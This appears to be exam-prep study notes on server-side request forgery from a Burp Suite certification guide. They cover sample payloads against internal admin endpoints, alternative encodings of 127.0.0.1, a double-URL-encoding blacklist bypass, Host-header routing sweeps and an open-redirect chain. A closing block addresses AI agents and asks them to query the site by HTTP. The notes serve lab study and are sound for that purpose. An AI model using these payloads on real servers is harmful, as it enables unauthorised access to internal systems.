# SSRF

> SSRF attack cause the server to make a connection to internal services within the organization, or force the server to connect to arbitrary external systems, potentially leaking sensitive data. Burp scanner may detect SSRF issue as an, `External service interaction (HTTP)`.

> SSRF Sample payloads.

```
/product/nextProduct?currentProductId=6&path=https://EXPLOIT.net  

stockApi=http://localhost:6566/admin  

http://127.1:6566/admin  

Host: localhost
```

> Alternative IP representation of `127.0.0.1`:

1. 2130706433
2. 017700000001
3. 127.1

### Bypass blacklist filter

> Double URL encode characters in URL to **Obfuscate** the `a` to `%2561`, resulting in the bypass of the blacklist filter.

> ***Identify*** the SSRF in the `stockAPI` parameter, and bypass the block by changing the URL target localhost and admin endpoint to: `http://127.1/%2561dmin`.

### Absolute url and localhost Host header

```
GET https://TARGET.net/
Host: OASTIFY.COM
```

> ***Identify*** SSRF flawed request parsing vulnerability by changing the `HOST` header to Collaborator server and providing an absolute URL in the GET request line and observe the response from the Collaborator server.

<br>

### Routing host ssrf

> ***Identify*** routing-based SSRF by altering the **host** header on request and observe the response. Routing-based SSRF via the Host header allow insecure access to a localhost Intranet.

```
GET / HTTP/1.1
Host: 192.168.0.§0§
```

!Remember about adding csrf and session cookies

### Open redirection

The target make **GET** request to the ***next product*** on the e-commerce site, using a **path** parameter. On the stockAPI POST request the value provided in body data is the partial path to internal system. See product page `source code` below.

> In this lab they state the admin interface is at `http://192.168.0.12:8080/admin` but in exam use the `localhost:6566`.

```
https://TARGET.net/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin
```

> On the POST stock request, replace the StockAPI value with the partial path, not the absolute URL, from the `nextProduct` GET request URL as the value of the `stockAPI` parameter.

```
stockApi=/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin
```

> <br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://oscp-7.gitbook.io/bscp-notes/data-exfiltration/ssrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.